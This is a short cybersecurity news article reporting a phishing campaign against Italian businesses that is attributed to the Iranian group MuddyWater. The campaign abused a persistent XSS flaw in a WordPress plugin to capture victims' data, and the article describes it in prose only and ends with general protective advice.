AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

Security alert: sophisticated phishing campaign hits Italy

An in-depth analysis reveals the advanced techniques of a cyber attack linked to Iranian entities, alarming Italian companies

In Italy, a sophisticated phishing campaign, with possible Iranian origins, targets businesses via deceptive emails leading to a malicious link. Advanced techniques such as Persistent XSS are used to steal personal data, prompting caution and security updates.

This pill is also available in Italian language

In Italy, considerable malicious activity has been recorded through a particularly sophisticated phishing campaign, attributable to alleged Iranian origins. This attack, primarily targeting local businesses, uses sophisticated techniques to bypass common security systems. The experts of the Red Hot Cyber team, including professionals wishing to remain anonymous, as well as the well-known penetration tester Davide Cavallini, have examined the distinctive elements of this campaign. Apparently harmless emails, but written in impeccable Italian, actually hide a malicious link which, disguised as an urgent need, leads victims to click involuntarily.

Technical analysis reveals the trap

Deepening the investigation, the technicians alerted by an anomalous redirection through JavaScript, discovered the use of an advanced phishing technique, identified as Persistent XSS. The target of this manipulation was a falsified document, simulating a password-protected order. This ingenious ploy specifically exploits a vulnerability reported as CVE-2023-6000 in the Popup Builder plugin. The personal data entered was unknowingly sent to a WordPress server in Iran, highlighting the potential implication of Iranian actors in orchestrating the attack.

Protection from online dangers: practical advice

Faced with such threats, it is essential to take preventative measures to safeguard your online security. For end users, constant training is recommended in order to distinguish suspicious emails and links. Additionally, using up-to-date antivirus and anti-malware solutions proves crucial. As for website owners, it is essential to keep systems, including plugins and libraries, up to date to prevent any exploits resulting from known vulnerabilities.

Potential involvement of APT MuddyWater

Following the shared analysis and thanks to the collaboration in the cybersecurity sector, the suspicion arises that MuddyWater, a well-known Iranian APT group, may be behind this phishing campaign. This entity, active since 2017, is famous for its commitment to cyber espionage and has already demonstrated an interest in targets located not only in the Middle East but also in other regions. It will be of primary importance to continue to monitor the development of this campaign and possibly adopt new defense measures to deal with these increasingly sophisticated threats.

Follow us on Google News for more pills like this

03/30/2024 14:18

Marco Verro

Last pills

Zero-day threat on Android devices: Samsung prepares a crucial updateFind out how Samsung is addressing critical Android vulnerabilities and protecting Galaxy devices from cyber threats

CrowdStrike: how a security update crippled the tech worldGlobal impact of a security update on banking, transportation and cloud services: what happened and how the crisis is being addressed

Checkmate the criminal networks: the Interpol operation that reveals the invisibleFind out how Operation Interpol exposed digital fraudsters and traffickers through extraordinary global collaboration, seizing luxury goods and false documents

Google Cloud security predictions for 2024: how AI will reshape the cybersecurity landscapeFind out how AI will transform cybersecurity and address geopolitical threats in 2024 according to Google Cloud report